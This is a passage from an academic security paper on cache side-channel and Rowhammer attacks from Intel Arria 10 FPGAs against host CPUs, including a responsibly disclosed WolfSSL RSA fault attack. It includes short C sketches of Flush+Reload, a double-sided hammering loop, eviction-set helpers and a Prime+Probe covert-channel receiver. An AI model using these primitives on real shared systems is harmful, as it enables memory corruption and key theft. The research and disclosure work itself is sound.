Abstract-After years of development, FPGAs are finally making an appearance on multi-tenant cloud servers. These heterogeneous FPGA-CPU architectures break common assumptions about isolation and security boundaries. Since the FPGA and CPU architectures share hardware resources, a new class of vulnerabilities requires us to reassess the security and dependability of these platforms.
In this work, we analyze the memory and cache subsystem and study Rowhammer and cache attacks on two proposed heterogeneous FPGA-CPU platforms by Intel: the Arria 10 GX integrated into the CPU package, and the Arria 10 GX PAC expansion card, which connects the FPGA to the CPU via PCIe. We show that while Intel PACs are currently immune to cache attacks from FPGA to CPU, the integrated platform is indeed vulnerable to Prime+Probe style attacks from the FPGA to the CPU's last-level cache. Further, we demonstrate JackHammer, a novel and efficient Rowhammer attack from the FPGA to the host's main memory. Our results indicate that a malicious FPGA can hammer twice as fast as a typical Rowhammer attack from the CPU on the same system and cause around four times as many bit flips. We demonstrate the efficacy of JackHammer through a realistic fault attack on the WolfSSL RSA signing implementation that reliably causes a fault after an average of fifty-eight RSA signatures, 25% faster than a CPU Rowhammer attack. In some scenarios our JackHammer attack produces faulty signatures more than three times as often and almost three times faster than a conventional CPU Rowhammer attack.
Index Terms-FPGA, side-channel, cache attack, Rowhammer, cloud security
I. INTRODUCTION
In recent years, as improvements in microprocessor performance have slowed, developers have looked to other computing resources to increase performance. Graphics processing units (GPUs), application-specific integrated circuits (ASICs), and FPGAs have all been adapted to accelerate applications such as cryptocurrency mining, high-frequency trading, and machine learning. FPGAs are particularly interesting for cloud computing applications, as they can be reconfigured for the needs of different users at different times without losing their exceptionally low latency. Amazon Web Services [3] and Alibaba Cloud [2] already offer FPGA instances with ultra-high-performance Xilinx Virtex UltraScale+ and Intel Arria 10 GX FPGAs to the consumer market. These FPGAs are designed for high I/O bandwidth and high compute capacity, making them ideal for server workloads. New Intel FPGAs offer cache-coherent memory systems for even better performance when data is passed back and forth between CPU and FPGA.
The flexibility of FPGA systems can also open up new attack vectors for malicious users in public clouds, or make existing ones more efficient to exploit. Integrated FPGA platforms connect the FPGA directly to the processor bus interconnect, giving the FPGA direct access to cache and memory [25]. Similarly, high-end FPGAs can be integrated into a server as an accelerator, e.g., connected via a PCIe interface [31, 60]. Such combinations provide unprecedented performance over a high-throughput, low-latency connection with the versatility of a reprogrammable FPGA infrastructure shared among cloud users. However, the tight integration may also expose users to new threats from malicious co-tenants.
This work exposes hardware and micro-architectural vulnerabilities in hybrid FPGA-CPU systems, with a particular focus on cloud platforms where the FPGA and the CPU are in distinct security domains: one potentially a victim and the other an attacker. We examine Intel's Arria 10 GX FPGA as an example of the current generation of FPGA accelerator platforms designed for heavy and/or cloud-based computation loads. We thoroughly analyze the memory interfaces between such platforms and their host CPUs. These interfaces, which allow the CPU and FPGA to interact in various direct and indirect ways, include hardware on both the FPGA and CPU, application libraries and software drivers executed by the CPU, and logical interfaces implemented on the FPGA outside of but accessible to the user-configurable region. We propose attacks that exploit practical use cases of these interfaces to target adjacent systems such as the CPU memory and cache.
A. Our Contributions
We demonstrate novel hardware attacks between the memory interface of Intel Arria 10 GX platforms and their host CPUs. Furthermore, we demonstrate a Rowhammer attack mounted from the FPGA against the CPU to cause faults in the WolfSSL RSA signature implementation and to leak a private RSA modulus factor. In summary:
- We thoroughly reverse-engineer and analyze the cache behavior and investigate the viability of cache attacks on realistic FPGA-CPU hybrid systems.
- Based on our investigation of the cache subsystem, we build a Rowhammer attack from the FPGA that bypasses caching to hammer twice as fast as the CPU can, causing faults that the CPU Rowhammer attack is unable to replicate.
- Our Rowhammer attack remains stealthy to any monitor on the CPU since it bypasses the CPU microarchitecture.
- Using both Rowhammer implementations, we demonstrate a fault attack on recent versions of the WolfCrypt RSA implementation, part of the WolfSSL library, and recover private keys. WolfSSL version 4.3.0 included protection against the attack after we reported the vulnerability, which affects versions up to 4.2.0.
- We demonstrate that the base blinding used in WolfCrypt's RSA implementation leaves the algorithm vulnerable to the Bellcore fault injection attack.
B. Experimental Setup
We analyze two distinct FPGA-CPU platforms with an Intel Arria 10 FPGA: 1) one integrated into the CPU package and 2) one on a Programmable Acceleration Card (PAC).
The integrated Intel Arria 10 is based on a prototype E5-2600v4 CPU with 12 physical cores. The prototype CPU has a Broadwell architecture in which the last-level cache (LLC) is inclusive of the L1/L2 caches. The CPU package has an integrated Arria 10 GX 1150 FPGA running at 400 MHz. All measurements on this platform are performed strictly from userspace, as access is kindly provided by Intel through their Intel Lab (IL) Academic Compute Environment (https://wiki.intel-research.net/). The IL environment also gives us user-level access to platforms with two PACs with Arria 10 GX 1150 FPGAs installed, running at 200 MHz. These systems have Intel Xeon Platinum 8180 CPUs, which come with a non-inclusive LLC. We carried out the Rowhammer experiments on our local Dell Optiplex 7010 system with an Intel i7-3770 CPU and a single DIMM of Samsung M378B5773DH0-CH9 1333 MHz 2 GB DDR3 DRAM, equipped with the same Intel PAC running at a primary clock speed of 200 MHz. (The PAC is intended to support a 400 MHz clock speed, but the current version of the Intel Acceleration Stack has a bug that halves the clock speed.)
The operating system (OS) running in the IL is a 64-bit Red Hat Enterprise Linux 7 with kernel version 3.10; we run Ubuntu 16.04 on our local test systems. OPAE was compiled and installed on July 15th, 2019 for both the FPGA PAC and the integrated FPGA platform. We used Quartus 17.
C. Vulnerability Disclosure
We informed the WolfSSL team of WolfCrypt's vulnerability to Bellcore-style RSA fault injection attacks on November 25, 2019. WolfSSL acknowledged the vulnerability on the same day and released WolfSSL 4.3.0 with a fix on December 20, 2019. MITRE Corporation published a description of the vulnerability as CVE-2019-19962 in the National Vulnerability Database on December 24, 2019 [1].
II. BACKGROUND
A. Cache Attacks
Cache attacks have been proposed against a variety of applications [45, 11, 22, 24, 6, 56]. In general, cache attacks exploit timing side effects of cache accesses to leak information. Modern cache systems use a hierarchical architecture that includes smaller, faster caches and bigger, slower caches. Measuring the latency of a memory access can often determine with high confidence which levels of cache contain a certain memory address (or whether it is cached at all). Cache subsystems also support coherency, which ensures that whenever memory is overwritten in one cache, copies of that memory in other caches are either updated or invalidated. Cache coherency can cause side effects in caches, allowing an attacker to learn about a cache line that is not even directly accessible [34]. Cache attacks have become a major focus of security research on cloud computing platforms, where users are allocated CPUs, cores, or virtual machines which in theory should offer perfect isolation, but in practice may leak information to each other via shared caches [28]. In the following, we introduce the cache attack techniques used later in this work.
a) Flush+Reload and Evict+Reload: Flush+Reload (F+R) [62] gives the attacker information about the victim's behavior with cache line granularity. To do so, the attacker cycles over three steps: 1) the attacker uses the clflush instruction to flush the cache line that is to be monitored; 2) she waits for the victim to execute; 3) she reloads the flushed line and measures the reload latency. If the latency is low, the cache line is served from the cache hierarchy, meaning that the cache line was accessed by the victim during its execution. If the access latency is high, the cache line was loaded from main memory, meaning that the victim did not access it during its execution.
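For illustration, the following minimal C sketch implements one Flush+Reload round on x86-64 using the clflush and rdtscp intrinsics; the threshold value is a hypothetical calibration constant, not a value from our measurements.

```c
/*
 * Minimal Flush+Reload round (sketch, x86-64 with clflush/rdtscp).
 * THRESHOLD is illustrative and must be calibrated per machine.
 */
#include <stdint.h>
#include <x86intrin.h>

#define THRESHOLD 120  /* TSC cycles; hypothetical calibration value */

/* Measure the reload latency of `addr` in TSC cycles. */
static inline uint64_t probe_latency(volatile uint8_t *addr)
{
    unsigned aux;
    uint64_t start = __rdtscp(&aux);   /* serializing timestamp read */
    (void)*addr;                       /* step 3: reload the line */
    return __rdtscp(&aux) - start;
}

/* One F+R round: returns 1 if the victim touched the line. */
static inline int victim_accessed(volatile uint8_t *addr)
{
    _mm_clflush((void *)addr);         /* step 1: flush the line */
    /* step 2: wait for the victim to execute */
    return probe_latency(addr) < THRESHOLD;  /* fast => cache hit */
}
```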
Evict+Reload (E+R) [40] is similar to F+R. In an E+R attack, if the system does not have a flush instruction, or its execution from userspace is disabled, the attacker can instead evict the desired cache line in the first step by accessing cache lines that form an eviction set. Methods for finding eviction sets are described later in this section.
F+R can work across cores and even across sockets, as long as the LLC is coherent, as is the case with many modern multi-CPU systems. E+R can be used if the attacker shares the same CPU socket (but not necessarily the same core) as the victim and if the LLC is inclusive. If the LLC is non-inclusive, the attacker can instead attack the inclusive directory structure used to ensure coherency [61]. These attacks are limited to shared memory scenarios, where the victim and attacker share data or instructions, as is the case with shared libraries on systems where memory de-duplication is enabled.
b) Flush+Flush: Flush+Flush (F+F) [21], similar to F+R, gives the attacker cache line granularity and consists of three steps. The only difference is in the third step, where the attacker flushes the cache line again and measures the execution time of the flush instruction instead of the memory access. F+F is faster than F+R, as the second flush phase can serve as the first flush of the next round. However, like F+R, F+F is limited to scenarios where a flush instruction is available and the victim and attacker share data or instructions.
c) Prime+Probe: Prime+Probe (P+P) gives the attacker a coarser, cache-set granularity than the aforementioned methods, since the attacker checks the status of the cache by probing a whole cache set rather than flushing or reloading a single line. However, this granularity is sufficient in many cases [46, 50, 65, 32, 45, 40, 43]. Again there are three steps: 1) the attacker primes the cache set under surveillance with dummy data by accessing a proper eviction set; 2) she waits for the victim to execute; 3) she accesses the eviction set again and measures the access latency (probing). If the latency is above a certain threshold, some part of the eviction set was evicted by the victim process, meaning that the victim accessed cache lines belonging to the cache set under surveillance [42].
Unlike F+R, E+R, and F+F, P+P does not rely on shared memory. However, it is more coarse-grained and noisier, works only if the victim is located on the same socket as the attacker, and relies on inclusive caches. In non-inclusive cache scenarios, an attacker again has to target the directory structure rather than the cache itself [61].
d) Eviction Sets: Caches store data in units of cache lines that hold 2^b bytes each. Caches are divided into 2^s sets, each capable of holding w cache lines; w is called the wayness or associativity of the cache. An eviction set is a set of congruent cache line addresses capable of filling a whole cache set. Two cache lines are considered congruent if they belong to the same cache set. Memory addresses are mapped to cache sets by the s bits of the physical memory address directly above the b least significant cache line offset bits. Additionally, some caches are divided into n slices, where n is the number of CPU cores. In the presence of slices, each slice has 2^s sets with w ways each. Previous work has reverse-engineered the mapping of physical address bits to cache slices on some Intel processors [33]. A minimal eviction set contains w addresses and therefore fills an entire cache set when accessed.
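To make the mapping concrete, the sketch below computes the set index of a physical address; the geometry constants are example values for a hypothetical 2 MB, 16-way slice with 64-byte lines, not the parameters of any platform measured in this paper.

```c
#include <stdint.h>

/*
 * Illustrative cache geometry: a 2 MB, 16-way slice with 64-byte lines
 * gives b = 6, s = 11, w = 16. Real values depend on the CPU model.
 */
#define LINE_BITS 6                    /* b: log2(line size)      */
#define SET_BITS  11                   /* s: log2(sets per slice) */
#define WAYS      16                   /* w: associativity        */

/* Set index: the s bits directly above the b line-offset bits. */
static inline uint64_t set_index(uint64_t paddr)
{
    return (paddr >> LINE_BITS) & ((1ULL << SET_BITS) - 1);
}

/*
 * Congruence check: a minimal eviction set consists of WAYS addresses
 * that agree on set_index() (and, on sliced caches, on the slice hash
 * reverse-engineered in [33]).
 */
static inline int congruent(uint64_t a, uint64_t b)
{
    return set_index(a) == set_index(b);
}
```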
B. Rowhammer
DRAM cells discharge over time, and the memory controller has to refresh the cells to avoid accidental data corruption.
Generally, DRAM cells are laid out in banks and rows, and each row within a bank has two adjacent rows, one on either side. In a Rowhammer attack, memory addresses in the same bank as the target memory address are accessed in quick succession. When memory adjacent to the target is accessed repeatedly, the electrostatic interference generated by the physical process of accessing the memory can accelerate the discharge of the bits stored in the target row. A "single-sided" Rowhammer attack accesses just one of these adjacent rows to generate bit flips in the target row; a "double-sided" Rowhammer attack accesses both adjacent rows and is generally more effective at producing bit flips. Rowhammer relies on the ability to find blocks of memory accessible to the malicious program (or, in this work, hardware) that are in the same memory bank as a given target address. The standard way to find such memory addresses is by exploiting row buffer conflicts as a timing side channel [14]. Pessl et al. [47] reverse-engineered the bank mapping algorithms of several CPU and DRAM configurations, which allows an attacker to deterministically calculate all physical addresses that share a bank if the chipset and memory configuration are known.
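A minimal CPU-side double-sided hammering loop might look as follows (a sketch assuming x86-64 with an available clflush instruction; selecting the two adjacent-row addresses is done beforehand with the timing side channel described above):

```c
#include <stdint.h>
#include <x86intrin.h>

/*
 * Double-sided hammering loop (sketch, x86-64). `above` and `below`
 * point into the two rows adjacent to the victim row in the same bank;
 * finding them is done beforehand via the row-buffer timing channel.
 */
static void hammer(volatile uint8_t *above, volatile uint8_t *below,
                   uint64_t iterations)
{
    while (iterations--) {
        (void)*above;                    /* activate row above victim */
        (void)*below;                    /* activate row below victim */
        _mm_clflush((void *)above);      /* force the next reads to   */
        _mm_clflush((void *)below);      /* come from DRAM, not cache */
    }
}
```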
C. Attacks on FPGA-CPU Systems
Classical power analysis methodologies like Kocher et al.'s differential power analysis [37] have been applied in new attacks on inter-chip FPGAs [66, 52, 51]. Such integrated and inter-chip FPGAs are available in various cloud environments and system-on-chip (SoC) products. In particular, Zhao et al. [66] demonstrated how to build an on-chip power monitor out of ring oscillators (ROs) that can be used to attack the host CPU or other FPGA tenants. In multi-tenant FPGA scenarios where partial reconfiguration by two separate security domains is possible, more powerful attacks become feasible. For instance, long wires on the FPGA can be used to spy on adjacent wires using ROs [15, 49, 48]. Ramesh et al. [49] exploited the speed of ROs to infer the bit carried on an adjacent wire and demonstrated a key recovery attack on AES. ROs can also be used as power wasters to create voltage drops and timing faults [16, 38]. Note that such attacks rely on FPGA multi-tenancy, which is not widely deployed yet. In contrast, in this work we only assume that the FPGA-CPU memory subsystem is shared among tenants.
D. RSA-CRT Sign
RSA signatures are computed by raising a plaintext m to a secret power d modulo N = pq, where p and q are prime and secret, and N is public [9]. These numbers must all be quite large for RSA to be secure, which makes the exponentiation rather slow. However, there is a common algebraic shortcut for modular exponentiation: the Chinese Remainder Theorem (CRT), used in many RSA signature implementations, including the WolfCrypt implementation we attack in section VI and OpenSSL [12]. The basic form of the RSA-CRT signature algorithm is shown in Algorithm 1. The CRT algorithm is equivalent to, but much faster than, simply computing m^d mod N, because d_p and d_q are of the order of p and q respectively, while d is of the order of N, which, being the product of p and q, is significantly greater than p or q; it is around four times faster [5] to compute the two exponentiations m^{d_p} and m^{d_q} than to compute m^d outright.

Algorithm 1 Chinese remainder theorem RSA signature
1: procedure SIGN(m: message, d: private exponent, p: private factor, q: private factor)
2:   S_p ← m^{d_p} mod p        ▷ equivalent to m^d mod p
3:   S_q ← m^{d_q} mod q        ▷ equivalent to m^d mod q
4:   I_q ← q^{-1} mod p
5:   return S ← S_q + q·((S_p − S_q)·I_q mod p)
6: end procedure
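For concreteness, a sketch of Algorithm 1 using the GMP library follows; the GMP calls are real, while the function itself is our illustration rather than WolfCrypt or OpenSSL code.

```c
#include <gmp.h>

/*
 * RSA-CRT signing following Algorithm 1 (sketch using GMP). dp and dq
 * are assumed precomputed as d mod (p-1) and d mod (q-1).
 */
void rsa_crt_sign(mpz_t S, const mpz_t m, const mpz_t dp, const mpz_t dq,
                  const mpz_t p, const mpz_t q)
{
    mpz_t Sp, Sq, Iq, t;
    mpz_inits(Sp, Sq, Iq, t, NULL);
    mpz_powm(Sp, m, dp, p);        /* Sp = m^dp mod p          */
    mpz_powm(Sq, m, dq, q);        /* Sq = m^dq mod q          */
    mpz_invert(Iq, q, p);          /* Iq = q^-1 mod p          */
    mpz_sub(t, Sp, Sq);
    mpz_mul(t, t, Iq);
    mpz_mod(t, t, p);              /* t = (Sp - Sq) * Iq mod p */
    mpz_mul(t, t, q);
    mpz_add(S, Sq, t);             /* S = Sq + q * t           */
    mpz_clears(Sp, Sq, Iq, t, NULL);
}
```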
III. ANALYSIS OF INTEL FPGA-CPU SYSTEMS
This section explains the hardware and software interfaces that the Intel Arria 10 GX FPGA platforms use to communicate with their host CPUs, and the firmware, drivers, and architectures that underlie them. We do not attack these systems directly in this work, but we make extensive use of them, as they form the most obvious and readily available attack surfaces between the FPGA platforms and their host CPUs. An overview of the architecture and hardware connections is given in Figure 1.
a) A Brief Introduction to Intel Terminology: Intel refers to a single logical unit implemented in FPGA logic with a single interface to the CPU as an Accelerator Functional Unit (AFU). So far, available FPGA platforms support only one AFU per Partial Reconfiguration Unit (PRU, also called the green region). The AFU is an abstraction similar to a program that captures the logic implemented on the FPGA. The FPGA Interface Manager (FIM) is part of the non-user-configurable portion (blue region) of the FPGA and contains external interfaces like memory and network controllers as well as the FPGA Interface Unit (FIU), which bridges those external interfaces with internal interfaces to the AFU.
A. Intel FPGA Platforms
a) Intel Programmable Acceleration Card with Arria 10 FPGA: Intel's Arria 10 GX Programmable Acceleration Card (PAC) is a PCIe expansion card for FPGA acceleration [31]. The Arria 10 GX FPGA on the card communicates with its host processor over a single PCIe Gen3x8 bus. Memory reads and writes from the FPGA to the CPU's main memory use physical addresses; in virtual environments, the PCI controller on the CPU side implements an IOMMU to translate physical addresses in the virtual machine (what Intel calls I/O Virtual Addresses, or IOVAs) to physical addresses in the host machine. Alongside the FPGA, the PAC contains 8 GB of DDR4, 128 MB of flash memory, and USB for debugging.
b) Intel Xeon Processor with integrated Arria 10 FPGA: Intel has also begun producing Xeon server processors with an integrated Arria 10 FPGA in the same package [25]. The FPGA and CPU are closely connected through two PCIe Gen3x8 links and an UltraPath Interconnect (UPI) link. UPI is Intel's high-speed CPU interconnect, replacing its predecessor QPI in Skylake and later Intel CPU architectures [44]. The FPGA has a 128 KiB direct-mapped cache that is kept coherent with the CPU caches over the UPI bus. Like the PCIe link on the PAC, both the PCIe links and the UPI link use I/O virtual addressing, appearing as physical addresses to virtualized environments. As the UPI link bypasses the PCI controller's IOMMU, the FIU implements its own IOMMU and device TLB to translate physical addresses for reads and writes using UPI [30].

Fig. 1. The software part of the Intel Acceleration Stack, called OPAE, is highlighted in orange. Its API is used by applications (yellow) to communicate with the AFU. The green region marks the part of the FPGA that is re-configurable from userspace at runtime. The blue region describes the static soft core of the FPGA; it exposes the CCI-P interface to the AFU.
B. Intel's FPGA-CPU Compatibility Layers
a) Open Programmable Acceleration Engine (OPAE): Intel's latest generations of FPGA products are designed for use with OPAE [29], part of the Intel Acceleration Stack. OPAE is an open-source, hardware-flexible software stack for interfacing with FPGAs that use Intel's Core Cache Interface (CCI-P), a hardware host interface for AFUs that specifies transaction requests, header formats, timing, and memory models [30]. Essentially, OPAE provides a software interface for software developers to interact with a hosted FPGA, while CCI-P provides a hardware interface for hardware developers to interact with the host CPU. Assuming it does not use any platform-specific hardware features, any CCI-P compatible AFU should be synthesizable (with a logically identical result) for any CCI-P compatible FPGA platform; OPAE is built on top of hardware- and OS-specific drivers and as such is compatible with any system with the appropriate drivers available. As described below, the OPAE/CCI-P system provides two main methods for passing data between the host CPU and the FPGA.
b) Memory-mapped I/O (MMIO): OPAE can send 32- or 64-bit MMIO requests to the AFU directly, or it can map an AFU's MMIO space into OS virtual memory [29]. CCI-P provides an interface for incoming MMIO requests and outgoing MMIO read responses. The AFU may respond to read and write requests in any way that the developer desires, though an MMIO read request will time out after 65,536 cycles of the primary FPGA clock. In software, MMIO offsets are counted in bytes and expected to be multiples of 4 (or 8, for 64-bit reads and writes), but in CCI-P the last two bits of the address are truncated, because at least 4 bytes are always being read or written. There are 16 available address bits in CCI-P, meaning that the total available MMIO space is 2^16 32-bit words, or 256 KiB [30].
c) Direct memory access (DMA): OPAE can instruct the OS and kernel to allocate a block of memory that can be read by the FPGA. There are a few important details in the way this memory is allocated: most critically, it is allocated in a contiguous physical address space. The FPGA uses physical addresses to index the shared memory, so physical and virtual offsets within the shared memory must match. The driver provides the physical address of the newly allocated buffer to the software; the address must be manually passed to the FPGA. On systems using Intel Virtualization Technology for Directed I/O (VT-d), which employs the I/O memory management unit (IOMMU) to provide I/O Virtual Addresses (IOVAs) to PCI devices, the memory is instead allocated in contiguous IOVA space. Either way, this ensures that the FPGA sees an accessible and contiguous buffer of the requested size. For buffer sizes up to and including one standard 4 kB memory page, a new standard memory page is allocated to the calling process by the operating system and configured to be accessible by the FPGA at its IOVA or physical address. For buffer sizes greater than 4 kB and up to 2 MB, the function calls the OS to allocate a 2 MB huge page. For even greater sizes, the function asks the OS for a 1 GB huge page. Keeping the buffer in a single page ensures that it is contiguously allocated in virtual and physical memory.
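The sketch below illustrates both mechanisms through the OPAE C API, assuming an already-opened accelerator handle; the OPAE functions are real, but CSR_TARGET_ADDR is a hypothetical AFU register offset used only for illustration.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <opae/fpga.h>

/* Hypothetical AFU register; the real offset depends on the AFU design. */
#define CSR_TARGET_ADDR 0x0040

int share_buffer_with_afu(fpga_handle accel)
{
    uint64_t *buf = NULL;
    uint64_t wsid, ioaddr;

    /* 2 MB request: OPAE backs anything above 4 kB with a huge page,
     * so the buffer is physically (or IOVA-) contiguous. */
    if (fpgaPrepareBuffer(accel, 2 * 1024 * 1024,
                          (void **)&buf, &wsid, 0) != FPGA_OK)
        return -1;

    /* Physical/IO virtual address the AFU must use for DMA. */
    fpgaGetIOAddress(accel, wsid, &ioaddr);

    /* Hand the DMA address to the AFU through its MMIO register space. */
    fpgaWriteMMIO64(accel, 0, CSR_TARGET_ADDR, ioaddr);

    printf("shared buffer at IOVA/phys 0x%" PRIx64 "\n", ioaddr);
    fpgaReleaseBuffer(accel, wsid);
    return 0;
}
```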
C. Cache and Memory Architecture on the Intel FPGAs
a) FPGA PAC: As well as having access to the CPU's memory system, the FPGA PAC has its own local RAM with a separate address space from that of the CPU and its memory. The PAC's RAM is always accessed directly; there is no cache between it and the FPGA. When the PAC reads from the CPU's memory, the CPU's memory system serves the request from its LLC if possible. If the memory being read or written is not present in the LLC, the request is served by the CPU's main RAM. The PAC is unable to modify the contents of the LLC with reads or writes.
b) Integrated Arria 10: The integrated Arria 10 FPGA has access to the host memory. Additionally, it has its own 128 KiB cache that is kept coherent with the CPU's caches over UPI. Memory requests over PCIe take the same path as requests issued by an FPGA PAC. If a request is driven over UPI, the local coherent FPGA cache is checked first; on a cache miss, the request is forwarded to the CPU's LLC or main memory.
An AFU has control over what data is to be cached locally by adding caching hints to the requests. The available caching hints are summarized in Table I . For memory reads, RdLine_I is used to not cache data locally and RdLine_S to cache data locally in the shared state. For memory writes, WrLine_I is used to not cache data locally, WrLine_M leaves written data in the local cache in the modified state, and WrPush_I does not cache data locally but requests to cache data in the CPU's LLC.
The CCI-P documentation [30] lists all caching hints as available for memory requests over UPI. For requests over PCIe, RdLine_I, WrLine_I, and WrPush_I can be used, while all other hints are ignored.
IV. CACHE ATTACKS ON INTEL FPGA-CPU PLATFORMS
We reverse-engineered parts of the memory subsystem and its behavior on current Arria 10 based FPGA-CPU cloud systems. In this section, we reveal several leakages that are exploitable by an AFU-based or CPU-based attacker targeting the CPU or FPGA, respectively. Finally, we discuss the viability of intra-FPGA cache attacks. A summary of the findings of this section is given in Table II.
To measure memory access latency from the FPGA, we designed a timer module clocked at 400 MHz. While enabled, it counts clock cycles and returns the counter value in a register when disabled.
The advantage of a timer realized in hardware is that it runs uninterruptible in parallel to all other modules contained in the AFU. Therefore, the timer precisely counts FPGA clock cycles, while timers on the CPU, such as rdtsc, may yield noisier measurements due to interruptions by the operating system and the CPU's out-of-order pipeline.
A. Cache Attacks from FPGA PAC to CPU
The Intel PAC has access to one PCIe lane that connects it to the main memory of the system through the CPU's LLC. The CCI-P documentation [30] mentions a timing difference between memory requests served by the CPU's LLC and those served by main memory. Using our timer module, we verified the suggested latency differences, as shown in Figure 2. Accesses to the LLC take between 139 and 145 cycles; accesses to main memory take between 148 and 158 cycles. Such distinct access latency distributions form the basis of cache attacks, as they let an attacker tell which part of the memory subsystem served a particular memory request. Our results show that FPGA-based attackers are capable of precisely distinguishing memory responses served by the LLC from those served by main memory.
In addition to probing, some way of influencing the state of the cache is needed to perform cache attacks. We investigated all possibilities of cache interaction offered by the CCI-P interface on an FPGA PAC and found that neither reading nor writing data from the FPGA PAC measurably altered the LLC. Therefore, we conclude that an FPGA PAC attacker is currently not capable of performing cache attacks against the CPU. However, the negative result for cache attacks from an FPGA PAC is a positive result for Rowhammer, as memory requests from the PAC are never cached on the CPU, so repeated accesses keep being served by DRAM (cf. section V).
B. Cache Attacks from Integrated Arria 10 to CPU
The integrated Arria 10 has access to two PCIe lanes and one QPI lane connecting it to the CPU's memory subsystem, like an FPGA PAC but with an additional cache on the FPGA accessible over QPI (cf. subsection III-C).
By timing memory requests from the AFU using our hardware timer, we show that distinct delays exist for the different levels of the memory subsystem. Both PCIe lanes show delays similar to those measured on an FPGA PAC (cf. Figure 2). Our memory access latency measurements for the QPI lane, depicted in Figure 3, show an additional peak for requests answered by the FPGA's local cache. Additionally, the two peaks for LLC and main memory accesses are narrower and further apart than in the PCIe case, likely because QPI, Intel's proprietary high-speed processor interconnect, is an on-chip bus connecting only CPUs and FPGAs. No other peripherals compete for QPI resources, yielding even less noisy timing measurements.
1) Reverse-engineering Caching Hint Behavior: Next, we reverse-engineered the behavior of the caching hints. The caching hints RdLine_I and RdLine_S, which are available for memory read requests, show no effect on the LLC, neither over PCIe nor over QPI. If read requests are sent over QPI, the RdLine_S flag makes the blue region cache the read data in the FPGA's local cache, evicting another cache line where necessary. Setting RdLine_I in a memory request over QPI makes the blue region mark the requested cache line as invalid in the local cache, effectively evicting it after answering the memory request.
When writing data, three caching hints are available when using the QPI lane. The caching hint WrLine_M caches the cache line before writing to it, leaving the cache line in the local cache in a modified state. The WrLine_I flag behaves as a write-back flag, evicting the cache line from the local cache to main memory. Using WrPush_I writes to a cache line, evicts it from the FPGA cache and hints the CPU to store the cache line in its LLC. Because the FPGA's cache is kept coherent with the CPU's LLC, writing to a cache line from the AFU must result in invalidating the cache line in the LLC or updating it. For the WrLine_M caching hint, the cache line must be evicted from the LLC as the cache line is left in the FPGA cache in a modified state. In the case of WrLine_I, either invalidating or updating may be true. When WrPush_I is used, we expect the cache line to be updated in the LLC.
To validate our assumptions, we timed the CPU's accesses to cache lines that were previously written by an AFU with one of the three caching hints set. In all three cases, the access times lie above 325 CPU cycles. On the same system, a single access to a cache line in main memory takes at least 175 cycles. Therefore, we show that a cache line written by the AFU can be evicted from the LLC by exploiting the coherency protocol. While we expected this behavior for WrLine_I and WrLine_M, LLC cache hits should occur at least occasionally when using the WrPush_I hint. However, none of our measurements ever showed a cache hit, leading us to assume that WrPush_I is not implemented in our prototype, even though it is documented.
As documented in [30] , caching hints WrLine_I and WrPush_I are available over PCIe as well. Our measurements show similar behavior, independent of the caching hint. But in contrast, to slow access times after writes over QPI, access times show that the CPU's read requests are served from LLC, even though WrLine_I is supposed to leave the cache line in the invalid state. Further investigation revealed that WrPush_I is indeed ignored by the blue stream but the CPU handles all PCIe requests as if the caching hint was set. Therefore, we showed that an attacker located on an integrated Arria 10, in contrast to an FPGA PAC attacker, is indeed capable of writing to the CPU's LLC.
As the CPU caches all write requests arriving over PCIe in its LLC, we assume a Direct Data I/O (DDIO)-like behavior, which gives the AFU access to only a reduced number of ways per cache set. This reduces the attack surface for a P+P attack, as only part of a cache set can be primed. However, attacks against other peripherals, where access to a limited number of cache ways per set is sufficient, remain possible, as recent results show [39].
2) Constructing a Covert Channel from AFU to CPU: Independent of which LLC ways are actually writable, the fact that the AFU can write data to at least one way per cache slice via PCIe allows us to construct a covert channel from the AFU to a cooperating process on the CPU using side effects of the LLC. To do so, we designed an AFU that writes random data to a fixed cache line over PCIe whenever a '1' is transmitted and stays quiet whenever a '0' is sent. In this way, the AFU sends messages that can be read by the CPU. For our test setup, we made the message configurable from the AFU's software counterpart. For the rest of this section, we refer to the address the AFU writes to as the target address.
The receiver process (not the software process directly communicating with the AFU over OPAE/CCI-P) first constructs an eviction set for the set/slice pair the target address maps to. To find an eviction set, we run a slightly modified version of Algorithm 1 of [58] using its Test 1. We use the OPAE API to allocate hugepages and obtain physical addresses (cf. Section III-B, paragraph c). Therefore, we can construct the eviction set from a rather small set of candidate addresses, all belonging to the same set.
To ease eviction set finding, the receiver has access to the target address via shared memory and tests its eviction set against the target address directly. This way, we do not need to explicitly identify the target address's LLC slice. In a real-world scenario, either the slice selection function has to be known [26, 33, 27] or eviction sets for all slices have to be constructed by seeking conflicting addresses [42, 45]. Monitoring each slice with one dedicated thread avoids the resulting time penalty.
Next, the receiver primes the LLC with the eviction set found and probes the set in an endless loop. Whenever the execution time of a probe is above a certain threshold, the receiver assumes that the eviction of one of its eviction set addresses was the result of the AFU writing to the target address and therefore interprets this as receiving a '1'. If the probe execution time stays below the threshold, a '0' is detected as no eviction of the eviction set addresses occurred.
An example measurement of the receiver and its decoding steps is depicted in Figure 4. The AFU sends every bit three times. This redundancy makes decoding easy at the cost of a low bandwidth of about 94.984 kBit/s. Throughput can be increased by sending bits with less redundancy. Also, multiple cache sets can be used in parallel to encode several bits at once. The synchronization problem can be solved by using one cache set as the clock, with the AFU writing an alternating bit pattern to it [55].
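A minimal sketch of the receiver's combined probe-and-re-prime step might look as follows, assuming an eviction set of WAYS addresses has already been found and the probe threshold has been calibrated; all names and constants are illustrative.

```c
#include <stdint.h>
#include <x86intrin.h>

#define WAYS      16     /* eviction set size: one address per way    */
#define THRESHOLD 900    /* TSC cycles for a full probe; illustrative */

/*
 * One receiver round: probing the eviction set also re-primes it, so
 * this function can be called in a tight loop. A slow probe means the
 * AFU's PCIe write evicted one of our lines, i.e. a '1' was sent.
 */
static int receive_bit(volatile uint8_t *evset[WAYS])
{
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    for (int i = 0; i < WAYS; i++)
        (void)*evset[i];                 /* probe (and re-prime) the set */
    return (__rdtscp(&aux) - start) > THRESHOLD;
}
```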
In summary, we have three findings for the integrated Arria 10:
- Despite WrPush_I being ignored by the blue region, an AFU can place data in the LLC because the CPU is configured to handle all PCIe write requests from the integrated Arria 10 as if WrPush_I were set.
- OPAE exposes physical addresses to the user and eases eviction set finding by enabling hugepages.
- Using these findings, we establish a covert channel between the AFU and the CPU with a bandwidth of 94.984 kBit/s.
C. Cache Attacks from CPU to Integrated Arria 10 FPGA
